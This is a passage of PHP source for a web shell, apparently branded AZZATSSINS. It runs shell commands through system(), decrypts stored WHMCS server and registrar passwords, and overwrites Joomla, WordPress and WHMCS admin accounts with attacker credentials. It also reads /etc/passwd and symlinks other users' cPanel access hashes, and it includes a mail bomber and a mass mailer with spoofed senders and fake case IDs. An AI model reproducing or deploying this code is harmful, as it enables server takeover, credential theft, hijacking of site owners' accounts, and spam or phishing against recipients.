- if (($c != 0 AND $c % $hash_length == 0))
- {
- $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
- }
- $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
- ++$c;
- }
- return $out;
- }
- function _hash ($string)
- {
- if (function_exists ('sha1'))
- {
- $hash = sha1 ($string);
- }
- else
- {
- $hash = md5 ($string);
- }
- $out = '';
- $c = 0;
- while ($c < strlen ($hash))
- {
- $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
- $c += 2;
- }
- return $out;
- }
- echo "
- <br>
- <FORM method='post'>
- <input type='hidden' name='form_action' value='2'>
- <br>
- <table class=tabnet style=width:320px;padding:0 1px;>
- <tr><th colspan=2>WHMCS Decoder</th></tr>
- <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
- <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
- <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
- <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
- <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
- <td> <INPUT class='inputzbut' type='submit' style='color:#FF0000;background-color:' value='Submit' name='Submit'></td>
- </table>
- </FORM>
- </center>
- ";
- if($_POST['form_action'] == 2 )
- {
- //include($file);
- $db_host=($_POST['db_host']);
- $db_username=($_POST['db_username']);
- $db_password=($_POST['db_password']);
- $db_name=($_POST['db_name']);
- $cc_encryption_hash=($_POST['cc_encryption_hash']);
- $link=mysql_connect($db_host,$db_username,$db_password) ;
- mysql_select_db($db_name,$link) ;
- $query = mysql_query("SELECT * FROM tblservers");
- while($v = mysql_fetch_array($query)) {
- $ipaddress = $v['ipaddress'];
- $username = $v['username'];
- $type = $v['type'];
- $active = $v['active'];
- $hostname = $v['hostname'];
- echo("<center><table border='1'>");
- $password = decrypt ($v['password'], $cc_encryption_hash);
- echo("<tr><td>Type</td><td>$type</td></tr>");
- echo("<tr><td>Active</td><td>$active</td></tr>");
- echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
- echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
- echo("<tr><td>Username</td><td>$username</td></tr>");
- echo("<tr><td>Password</td><td>$password</td></tr>");
- echo "</table><br><br></center>";
- }
- $link=mysql_connect($db_host,$db_username,$db_password) ;
- mysql_select_db($db_name,$link) ;
- $query = mysql_query("SELECT * FROM tblregistrars");
- echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
- echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
- while($v = mysql_fetch_array($query)) {
- $registrar = $v['registrar'];
- $setting = $v['setting'];
- $value = decrypt ($v['value'], $cc_encryption_hash);
- if ($value=="") {
- $value=0;
- }
- $password = decrypt ($v['password'], $cc_encryption_hash);
- echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
- }
- }
- }
- $currentCMD = str_replace("\\\"","\"",$currentCMD);
- $currentCMD = str_replace("\\\'","\'",$currentCMD);
- if( $_POST['_act'] == "Upload!" ) {
- if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
- echo "<center><b>Error while uploading file!</b></center>";
- } else {
- echo "<center><pre>";
- system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
- echo "</pre><b>File uploaded successfully!</b></center>";
- }
- } else {
- echo "<b><br><br><pre><br>";
- $currentCMD = "cd ".$currentWD.";".$currentCMD;
- system($currentCMD);
- echo "<br></pre><br></b>";
- }
- if (isset($_GET['AZZATSSINS']) && ($_GET['AZZATSSINS'] == 'JPASS')) {
- ?>
- <form action="?&AZZATSSINS=JPASS" method="post">
- <?php
- echo"<body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
- ";
- echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ JOOMLA</span> <span class='b8'>PASS CHANGER ]:=O</span></b></nobr><br/><br/> ";
- if(empty($_POST['pwd'])){
- echo "<FORM method='POST'><table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL </th></tr> <tr><td> Host</td><td>
- <input style='width:270px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr>
- <tr><td> Database</td><td>
- <input style='width:270px;' class='inputz' type='text' name='database' value='database' /></td></tr>
- <tr><td> username</td><td>
- <input style='width:270px;' class='inputz' type='text' name='username' value='db_user' /></td></tr>
- <tr><td> password</td><td>
- <input style='width:270px;' class='inputz' type='password' name='password' value='**' /></td></tr>
- <tr><td> New User</td><td>
- <input style='width:270px;' class='inputz' name='admin' value='azzatssins' /></td></tr>
- <tr><td> New Pass </td>
- <td>123456 = <input style='width:160px;' class='inputz' name='pwd' value='e10adc3949ba59abbe56e057f20f883e' /> </td></tr>
- <tr><td><input style='width:130%;' class='inputzbut' type='submit' value='>>' name='send' /></FORM>
- </td></tr></table><br>";
- } else {
- $localhost = $_POST['localhost'];
- $database = $_POST['database'];
- $username = $_POST['username'];
- $password = $_POST['password'];
- $pwd = $_POST['pwd'];
- $admin = $_POST['admin'];
- @mysql_connect($localhost,$username,$password) or die(mysql_error());
- @mysql_select_db($database) or die(mysql_error());
- $hash = crypt($pwd);
- $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 62") or die(mysql_error());
- $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 62") or die(mysql_error());
- $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 63") or die(mysql_error());
- $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 63") or die(mysql_error());
- $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 64") or die(mysql_error());
- $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 64") or die(mysql_error());
- $SQL=@mysql_query("UPDATE jos_users SET username ='".$admin."' WHERE ID = 65") or die(mysql_error());
- $SQL=@mysql_query("UPDATE jos_users SET password ='".$pwd."' WHERE ID = 65") or die(mysql_error());
- if($SQL){
- echo "<br><br><b><nobr><span class='b11'> Password Change Successfully</span></nobr></b><br/>";
- }
- }
- echo "</div>";
- }
- ?>
- <?php
- if (isset($_GET['AZZATSSINS']) && ($_GET['AZZATSSINS'] == 'WPASS')) {
- ?>
- <form action="?&AZZATSSINS=WPASS" method="post">
- <?php
- echo"<body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
- ";
- echo "
- <center><br/><br/><nobr><b><span class='b7'>O=:[ WORDPRESS USER</span> <span class='b8'> CHANGE ]:=O</span></b></nobr><br/><br/> ";
- if(empty($_POST['pwd'])){
- echo "<FORM method='POST'>
- <table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL server</th></tr> <tr><td> Host</td><td>
- <input style='width:220px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td> Database</td><td>
- <input style='width:220px;' class='inputz' type='text' name='database' value='wp-' /></td></tr> <tr><td> username</td><td>
- <input style='width:220px;' class='inputz' type='text' name='username' value='wp-' /></td></tr> <tr><td> password</td><td>
- <input style='width:220px;' class='inputz' type='text' name='password' value='**' /></td></tr>
- <tr><td> User baru</td><td>
- <input style='width:220px;' class='inputz' type='text' name='admin' value='azzatssins' /></td></tr>
- <tr><td> Pass Baru</td><td>
- <input style='width:80px;' class='inputz' type='text' name='pwd' value='17081945' />
- <input style='width:19%;' class='inputzbut' type='submit' value='>>' name='send' /></FORM>
- </td></tr> </table><br><br><br><br>
- ";
- }else{
- $localhost = $_POST['localhost'];
- $database = $_POST['database'];
- $username = $_POST['username'];
- $password = $_POST['password'];
- $pwd = $_POST['pwd'];
- $admin = $_POST['admin'];
- @mysql_connect($localhost,$username,$password) or die(mysql_error());
- @mysql_select_db($database) or die(mysql_error());
- $hash = crypt($pwd);
- $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 1") or die(mysql_error());
- $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 1") or die(mysql_error());
- $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 2") or die(mysql_error());
- $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 2") or die(mysql_error());
- $a4s=@mysql_query("UPDATE wp_users SET user_login ='".$admin."' WHERE ID = 3") or die(mysql_error());
- $a4s=@mysql_query("UPDATE wp_users SET user_pass ='".$hash."' WHERE ID = 3") or die(mysql_error());
- $a4s=@mysql_query("UPDATE wp_users SET user_email ='".$SQL."' WHERE ID = 1") or die(mysql_error());
- if($a4s){
- echo "<br><br><b><nobr><span class='b11'> Password Change Successfully</span></nobr></b><br/>";
- }
- }
- echo "</div>";
- }
- if($_GET['AZZATSSINS']=="encrypt"){
- echo "
- <table bgcolor=#cccccc width=\"100%\">
- <tbody><tr><td align=\"right\" width=100>
- <p dir=ltr><b><font color=#990000 size=-2><br><p align=left><center>
- Encypton With ( MD5 | Base64 | Crypt | SHA1 | MD4 | SHA256 )<br><br>
- <form method=\"POST\">
- <font color=\"gray\">String To Encrypt : </font><input type=\"text\" value=\"\" name=\"ENCRYPTION\">
- <input type=\"submit\" value=\"Submit\"></form>";
- if(!$_POST['ENCRYPTION']=='')
- {
- $md5 = $_POST['ENCRYPTION'];
- echo "<font color=gray>MD5 : </font>".md5($md5)."<br>";
- echo "<font color=gray>Base64 : </font>".base64_encode($md5)."<br>";
- echo "<font color=gray>Crypt : </font>".CRYPT($md5)."<br>";
- echo "<font color=gray>SHA1 : </font>".SHA1($md5)."<br>";
- echo "<font color=gray>MD4 : </font>".hash("md4",$md5)."<br>";
- echo "<font color=gray>SHA256 : </font>".hash("sha256",$md5)."<br></tbody></tr></td></table>";
- }
- }
- if($_GET['open']=="ports"){
- $rstart = (isset($_POST['rstart']) and is_numeric($_POST['rstart']) and $_POST['rstart'] >= 1) ? $_POST['rstart'] : 1 ;
- $rend = (isset($_POST['rend']) and is_numeric($_POST['rend']) and $_POST['rend'] > 1) ? $_POST['rend'] : 999999 ;
- echo("<script type=\"text/javascript\">");
- echo("function Show(SelectValue){");
- echo("document.getElementById('RangeDiv').style.display=\"none\";");
- echo("document.getElementById('SpecificDiv').style.display=\"none\";");
- echo("if(SelectValue == \"range\")");
- echo("document.getElementById('RangeDiv').style.display=\"inline\";");
- echo("if(SelectValue == \"specific\")");
- echo("document.getElementById('SpecificDiv').style.display=\"inline\";");
- echo("}</script>");
- echo("<span class=\"PageTitle\">Open Ports Scanner</span><br /><br />");
- echo('<form method="post">');
- echo('<u>Ports:</u><br /><br />');
- echo('<select id="port" name="port" onchange="javascript:Show(this.value);">');
- echo('<option value="automatic">Automatic - All Ports</option>');
- echo('<option value="range">Range of Ports</option>');
- echo('<option value="specific">Specific Ports</option>');
- echo('</select><br /><br />');
- echo('<div id="RangeDiv" style="display:none;">From: <input type="text" id="rstart" name="rstart" value="'.$rstart.'" /> To: <input type="text" id="rend" name="rend" value="'.$rend.'" /><br /><br /></div>');
- echo('<div id="SpecificDiv" style="display:none;"><textarea rows="5" cols="50" id="specific" name="specific" />'.@htmlspecialchars($_POST['specific']).'</textarea><br />Use space (not new line!) to separate between the ports.<br /><br /></div>');
- echo('<input type="submit" id="submit" name="submit" value="Scan" />');
- echo('</form>');
- if(isset($_POST['submit'])){
- $first = "yes";
- echo("<br /><br /><u>Results</u>:<br />\n");
- if($_POST['port'] == "range"){
- if($rend > $rstart){
- for($i=$rstart;$i<$rend;$i++){
- if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
- if($first == "no")
- echo(", ");
- echo $i;
- $first = "no";
- }
- }
- echo(".");
- }
- else{
- echo("Range start number can't be bigger than the end number.");
- }
- }
- else if($_POST['port'] == "specific"){
- $list = explode(" ",$_POST['specific']);
- foreach($list as $i){
- if(is_numeric($i)){
- if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
- if($first == "no")
- echo(", ");
- echo $i;
- $first = "no";
- }
- }
- }
- echo(".");
- }
- else{
- for($i=0;$i>=0;$i++){
- if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
- if($first == "no")
- echo(", ");
- echo $i;
- $first = "no";
- }
- }
- echo(".");
- }
- }
- }
- if($_GET['AZZATSSINS']=="BOMAIL"){
- ?>
- <?php
- /**
- AZZATSSINS
- **/
- $kontol = 'Mail Bomber Siap Siaga...';
- function boombardir($text){
- if (!get_magic_quotes_gpc()){
- return $text;
- }
- return stripslashed($text);
- }
- if(isset($_POST['kirim_email'])){
- $mail_to = $_POST['mail_to'];
- $fromname = $_POST['from_name'];
- $fromaddress = $_POST['mail_from'];
- $mail_subject = $_POST['mail_subject'];
- $mail_content = boombardir($_POST['mail_content']);
- $fuckline = "\n\t";
- $headers = "From: ".$fromname." <".$fromaddress."> ".$fuckline;
- if (($_POST['banyak_email']) <=1) {
- if(@mail($mail_to,$mail_subject,$mail_content,$headers)){
- $kontol = "email sent to $mail_to";
- }
- else $kontol = "Mail Sending is <font color=red> Failed </font> .";
- }
- elseif (($_POST['banyak_email']) > 1){
- $intibom = $_POST['banyak_email'];
- $kabehe = 0; $kabehekirim=0; $msgtf=0;
- for ($i=1; $i <= $intibom; $i++) {
- $acakjudul = substr(md5($i."slackerc0de"),-4);
- $mailsubject = $mail_subject." - ".$acakjudul;
- if(@mail($mail_to,$mailsubject,$mail_content,$headers)){
- $kabehekirim++;
- } else {
- $msgtf++;
- }
- $kabehe++;
- }
- $kontol = "<font color=red> $msgtf </font> | <font color=red> $kabehekirim </font>Success | of total $kabehe emails sending to : $mail_to </br> From: $fromadress <br />Subject: $mail_subject <br />Content: $mail_content";
- }
- }
- ?>
- <body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
- <br /><br />
- <form class="brd" method="post" style="border:1px solid #008000; padding:15px; text-align:left; -moz-border-radius: 10px; border-radius: 10px;" >
- <table style="padding: 0 0 0 30px">
- <tr><td><br />
- <table style="padding: 0 0 0 30px">
- <tr><td width="100">Target eMail :<td width="300">
- <input style="witdh:250px;" type="text" value="<?php if(mail_to) {echo "$mail_to";} ?>" name="mail_to" />
- </tr></td>
- <tr><td>Sender Name :<td width="300">
- <input style="witdh:250px;" type="text" value="<?php if(fromname) {echo "$fromname";} ?>" name="from_name" />
- </tr></td>
- <tr><td>Sender eMail :<td width="300">
- <input style="witdh:250px;" type="text" value="<?php if(fromaddress) {echo "$fromaddress";} ?>" name="mail_from" />
- </tr></td>
- <tr><td>Subject :<td width="300">
- <input style="witdh:250px;" type="text" value="<?php if(mail_subject) {echo "$mail_subject";} ?>" name="mail_subject" />
- </tr></td>
- <tr><td>Total of Send :<td width="300">
- <input style="witdh:87px;" type="number" value="<?php if($_POST['banyak_email']) {echo $_POST['banyak_email'];} else {echo '100';} ?>" name="banyak_email" />
- <input style="witdh:140px;" type="submit" value=" SUBMIT " name="kirim_email" />
- </tr></td>
- </table>
- </td></tr>
- <tr><td><br />
- Message :
- <center>
- <textarea name="mail_content" cols="60" rows="8" >
- <?php
- if ($mail_content) {
- echo "mail_content";
- }
- ?>
- </textarea>
- </center>
- </td></tr>
- </table>
- </form><br />
- <div class="brd" style="border:1px solid #008000; padding:15px; font-size:11px: text-align:left;">
- <?php
- echo "$kontol";
- ?>
- <?php }
- if($_GET['whmcs']=="passchanger"){
- ?>
- <p><br/><body>
- <center><nobr><b><span class="b7">O=:[ PASSWORD</span> <span class="b8">CHANGER ]:=O</span></b></nobr><br/><br/>
- <p><form method="post">
- <table border=1>
- <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu1" value="localhost"></td></tr>
- <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu2"></td></tr>
- <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu3"></td></tr>
- <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu4"></td></tr>
- <tr><td>id_admin</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" value="1" name="idmaho"></td></tr>
- <tr><td>new_username</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" value="azzatssins" name="userbaru"></td></tr>
- <tr><td>new_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" value="17081945" name="passbaru"></td></tr>
- <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
- </table>
- <br>
- </form>
- </center>
- <?php
- if(isset($_POST['plapon'])) {
- $anu1 = $_POST['anu1'];
- $anu2 = $_POST['anu2'];
- $anu3 = $_POST['anu3'];
- $anu4 = $_POST['anu4'];
- @mysql_connect($anu1,$anu2,$anu3);
- @mysql_select_db($anu4);
- $idmaho=str_replace("\'","'",$idmaho);
- $target_id = $_POST['idmaho'];
- $userbaru=str_replace("\'","'",$userbaru);
- $ganti_user = $_POST['userbaru'];
- $passbaru=str_replace("\'","'",$passbaru);
- $hash_pass = $_POST['passbaru'];
- $ganti_pass = md5($hash_pass);
- $colox = "UPDATE tbladmins SET username ='".$ganti_user."' WHERE id ='".$target_id."'";
- $coloxx = "UPDATE tbladmins SET password ='".$ganti_pass."' WHERE id ='".$target_id."'";
- $udah_ganteng=@mysql_query($colox);
- $udah_ganteng=@mysql_query($coloxx);
- if($udah_ganteng)
- {
- echo "<font color='lime'>SUKSES BOS GANTENG :P</font>";
- }
- }
- }if($_GET['reseller']=="grabber"){
- echo '<br><br><body bgcolor=black><center>
- <img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"><br/><br/>
- <nobr><b><span class="b7">O=:[ CPANEL</span> <span class="b8">GRABBER ]:=O</nobr></span><br/><br/>
- <form method="POST">
- <center>
- <textarea style="color:red;background-color:#000000" cols="60" name="passwd" rows="20">';
- $uSr=file("/etc/passwd");
- foreach($uSr as $usrr)
- {
- $str=explode(":",$usrr);
- echo $str[0]."\n";
- }
- ?>
- </textarea><p>
- <nobr><font style="color:red;background-color:#000000">
- [~] Home :
- <select style="color:red;background-color:#000000" title="Select Target Home" name="home" size="10">
- <option title="home" value="home">home</option>
- <option title="home2" value="home2">home2</option>
- <option title="home3" value="home3">home3</option>
- <option title="home4" value="home4">home4</option>
- <option title="home5" value="home5">home5</option>
- <option title="home6" value="home6">home6</option>
- <option title="home7" value="home7">home7</option>
- <option title="home8" value="home8">home8</option>
- <option title="home9" value="home9">home9</option>
- <option title="home10" value="home10">home10</option>
- </select> [~] Htaccess :
- <select style="color:red;background-color:#000000" title="Select Software" name="soft" size="10">
- <option title="Apache" value="Options all
- Options +Indexes
- Options +FollowSymLinks
- DirectoryIndex Sux.html
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType text/plain .html
- AddHandler txt .html
- Require None
- Satisfy Any">Apache</option>
- <option title="Litespeed" value="
- Options +FollowSymLinks
- DirectoryIndex seees.html
- RemoveHandler .php
- AddType application/octet-stream .php ">Litespeed</option>
- </select> <input style="color:red;background-color:#000000" name="anu" size="10"
- value="<< START SCAN >>" type="submit">
- <br/><br/></form></center>
- <?php
- @ini_set('html_errors',0);
- @ini_set('max_execution_time',0);
- @ini_set('display_errors', 0);
- @ini_set('file_uploads',1);
- if ($_POST['anu']) {
- $path = $_POST['path'];
- $home = $_POST['home'];
- $functions=@ini_get("disable_functions");
- if(eregi("symlink",$functions))
- {
- die ('Kurang Ganteng Cok');
- }
- @mkdir(RESELLER, 0755);
- @chdir(RESELLER);
- $htaccess=$_POST['soft'];
- file_put_contents(".htaccess",$htaccess,FILE_APPEND);
- $passwd=explode("\n",$_POST["passwd"]); foreach($passwd as $pwd){
- $user=trim($pwd);
- @symlink('/'.$home.'/'.$user.'/public_html/moving.page/index.html',$user.' <~ RESELLER1');
- @symlink('/'.$home.'/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER2');
- @symlink('/'.$home.'/'.$user.'/public_html/.accesshash',$user.' <~ RESELLER3');
- @symlink('/'.$home.'/'.$user.'/.accesshash',$user.' <~ RESELLER4');
- }
- echo'<meta http-equiv="Refresh" content= "0; url=RESELLER"></body></html> ';
- }
- }
- if($_GET['mas']=="mailer"){
- set_time_limit(intval($_POST['timelimit']));
- if (!function_exists('quoted_printable_encode')) {
- function quoted_printable_encode($input, $line_max = 75)
- {
- $hex = array('0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F');
- $lines = preg_split("/(?:\r\n|\r|\n)/", $input);
- $linebreak = "=0D=0A=\r\n";
- $line_max = $line_max - strlen($linebreak);
- $escape = "=";
- $output = "";
- $cur_conv_line = "";
- $length = 0;
- $whitespace_pos = 0;
- $addtl_chars = 0;
- for ($j = 0; $j < count($lines); $j++) {
- $line = $lines[$j];
- $linlen = strlen($line);
- for ($i = 0; $i < $linlen; $i++) {
- $c = substr($line, $i, 1);
- $dec = ord($c);
- $length++;
- if ($dec == 32) {
- if (($i == ($linlen - 1))) {
- $c = "=20";
- $length += 2;
- }
- $addtl_chars = 0;
- $whitespace_pos = $i;
- } elseif (($dec == 61) || ($dec < 32) || ($dec > 126)) {
- $h2 = floor($dec / 16);
- $h1 = floor($dec % 16);
- $c = $escape . $hex["$h2"] . $hex["$h1"];
- $length += 2;
- $addtl_chars += 2;
- }
- if ($length >= $line_max) {
- $cur_conv_line .= $c;
- $whitesp_diff = $i - $whitespace_pos + $addtl_chars;
- if (($i + $addtl_chars) > $whitesp_diff) {
- $output .= substr($cur_conv_line, 0, (strlen($cur_conv_line) - $whitesp_diff)) . $linebreak;
- $i = $i - $whitesp_diff + $addtl_chars;
- } else {
- $output .= $cur_conv_line . $linebreak;
- }
- $cur_conv_line = "";
- $length = 0;
- $whitespace_pos = 0;
- } else {
- $cur_conv_line .= $c;
- }
- }
- $length = 0;
- $whitespace_pos = 0;
- $output .= $cur_conv_line;
- $cur_conv_line = "";
- if ($j <= count($lines) - 1) {
- $output .= $linebreak;
- }
- }
- return trim($output);
- }
- }
- $action=$_POST['action'];
- $from=$_POST['from'];
- $subject=$_POST['subject'];
- $realname=$_POST['realname'];
- $replyto=$_POST['replyto'];
- $message=$_POST['message'];
- $emaillist=$_POST['emaillist'];
- $file_name=$_FILES['file']['name'];
- $contenttype=$_POST['contenttype'];
- $file=$_FILES['file']['tmp_name'];
- $amount=$_POST['amount'];
- $encode_text=$_POST['encode'];
- $message = urlencode($message);
- $message = ereg_replace("%5C%22", "%22", $message);
- $message = urldecode($message);
- $message = stripslashes($message);
- $subject = stripslashes($subject);
- if ($encode_text == "yes") {
- $subject = preg_replace('/([^a-z ])/ie', 'sprintf("=%02x",ord(StripSlashes("\\1")))', $subject);
- $subject = str_replace(' ', '_', $subject);
- $subject = "=?UTF-8?Q?$subject?=";
- $realname = preg_replace('/([^a-z ])/ie', 'sprintf("=%02x",ord(StripSlashes("\\1")))', $realname);
- $realname = str_replace(' ', '_', $realname);
- $realname = "=?UTF-8?Q?$realname?=";
- }
- ?>
- <form name="form1" method="post" action="" enctype="multipart/form-data">
- <table width="842" border="0">
- <tr>
- <td width="95">
- <div align="right">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Email:</font>
- </div>
- </td>
- <td width="220">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
- <input type="text" name="from" placeholder="input your email sender" value="<?php print $from; ?>" size="30" />
- </font>
- </td>
- <td width="238">
- <div align="right">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Name:</font>
- </div>
- </td>
- <td width="271">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
- <input type="text" name="realname" placeholder="input your name sender" value="<?php $realname; ?>" size="30" />
- </font>
- </td>
- </tr>
- <tr>
- <td width="95">
- <div align="right">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font>
- </div>
- </td>
- <td width="220">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
- <input type="text" name="replyto" value="<?php print $replyto; ?>" size="30" />
- </font>
- </td>
- <td width="238">
- <div align="right">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Attach File:</font>
- </div>
- </td>
- <td width="271">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
- <input type="file" name="file" size="24" />
- </font>
- </td>
- </tr>
- <tr>
- <td width="95">
- <div align="right">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font>
- </div>
- </td>
- <td colspan="3">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
- <input type="text" name="subject" value="<?php $subject; ?>" size="90" />
- </font>
- </td>
- </tr>
- <td colspan="3" height="22" style="padding:10px;"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
- <font color="#FF0000">Encode sending information ?</font> <select style="background:#EFFBF8;;border: 1px solid #01A9DB;color:#333" size="1" name="encode">
- <option <?php if($encode_text == "yes"){print "selected";} ?>>yes</option>
- <option <?php if($encode_text == "no"){print "selected";} ?>>no</option>
- </select></font></td>
- <tr valign="top">
- <td colspan="3">
- <font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Message Box :</font>
- </td>
- <td width="271">
- <font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Email List :</font>
- </td>
- </tr>
- <tr valign="top">
- <td colspan="3">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
- <textarea name="message" cols="56" rows="10"><?php print $message; ?></textarea><br /> <br />
- <input type="radio" name="contenttype" value="plain" /> Plain
- <input type="radio" name="contenttype" value="html"checked="checked" /> HTML
- <input type="hidden" name="action" value="send" /><br />
- Number to send: <input type="text" name="amount" value="1" size="10" /><br />
- Maximum script execution time (in seconds, 0 for no timelimit) <input type="text" name="timelimit" value="0" size="10" /><br /> <br />
- <input type="submit" value="Send Email" />
- </font>
- <p><div class="fb-like" data-href="https://www.facebook.com/AZZATSSINS.CYBERSERKERS" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div></p>
- </td>
- <td width="271">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
- <textarea name="emaillist" cols="32" rows="10"><?php print $emaillist; ?></textarea>
- </font>
- </td>
- </tr>
- </table>
- </form><hr/>
- <center>
- <table style="width: 1024px;">
- <tr>
- <td style="width: 1024px;">
- <div style="overflow:auto; width:1024px; height: 470px; font-size: 11px; color:lime" >
- <?php
- if ($action == "send") {
- if (!$from && !$subject && !$message && !$emaillist) {
- echo "<script>alert('Please complete all the fields.'); </script>";
- exit;
- }
- $allemails = split("\n", $emaillist);
- $numemails = count($allemails);
- if ($file_name) {
- if (!file_exists($file)) {
- die("The file you are trying to upload could not be uploaded to the server");
- }
- $content = fread(fopen($file, "r"), filesize($file));
- $content = chunk_split(base64_encode($content));
- $uid = strtoupper(md5(uniqid(time())));
- $name = basename($file);
- }
- for ($xx = 0; $xx < $amount; $xx++) {
- for ($x = 0; $x < $numemails; $x++) {
- $to = $allemails[$x];
- if ($to) {
- $to = ereg_replace(" ", "", $to);
- $nrmail = $x + 1;
- $domain = substr($from, strpos($from, "@"), strlen($from));
- print "Sending $nrmail Email of $numemails to <font color=\"magenta\">$to</font> ==>";
- flush();
- $ranCaseID = ' (Case ID # PP-003-'.rand(111,999).'-'.rand(111,999).'-'.rand(111,999).')';
- $subject = str_replace('randomcase', $ranCaseID, $subject);
- $randfrom = rand();
- $fromrand = str_replace('random', $randfrom, $from);
- $header = "From: $realname <$fromrand>\r\nReply-To: $replyto\r\n";
- $header .= "Message-ID: <31337$numemails.$nrmail$domain>\r\n";
- $header .= "MIME-Version: 1.0\r\n";
- if ($file_name)
- $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
- if ($file_name)
- $header .= "--$uid\r\n";
- $header .= "Content-Type: text/$contenttype; charset=UTF-8\r\n";
- $header .= "Content-Transfer-Encoding: quoted-printable\r\n\r\n";
- $header .= quoted_printable_encode($message)."\r\n";
- if ($file_name)
- $header .= "--$uid\r\n";
- if ($file_name)
- $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
- if ($file_name)
- $header .= "Content-Transfer-Encoding: base64\r\n";
- if ($file_name)
- $header .= "$content\r\n";
- if ($file_name)
- $header .= "--$uid--";
- mail($to, $subject, "", $header);
- print "<font color=\"yellow\"> <i>Success!</i></font><br>";
- flush();
- }
- }
- }
- }
- ?>
- </div>
- </td>
- </tr>
- </center>
- <p class="style2"> </p>
- <p class="style1"> </p>
- <?php
- if(isset($_POST['action']) && $numemails !==0 ){
- echo "<script>alert('Mail sending complete\\r\\n$numemails mail(s) was sent successfully'); </script>";
- }
- ?>
- </body>
- </html>
- <?php }
- if($_GET['md5']=="decrypter"){
- set_time_limit(0);
- ?>
- <script type="text/javascript" src="http://code.jquery.com/jquery-1.10.2.min.js"></script>
- <script type="text/JavaScript">
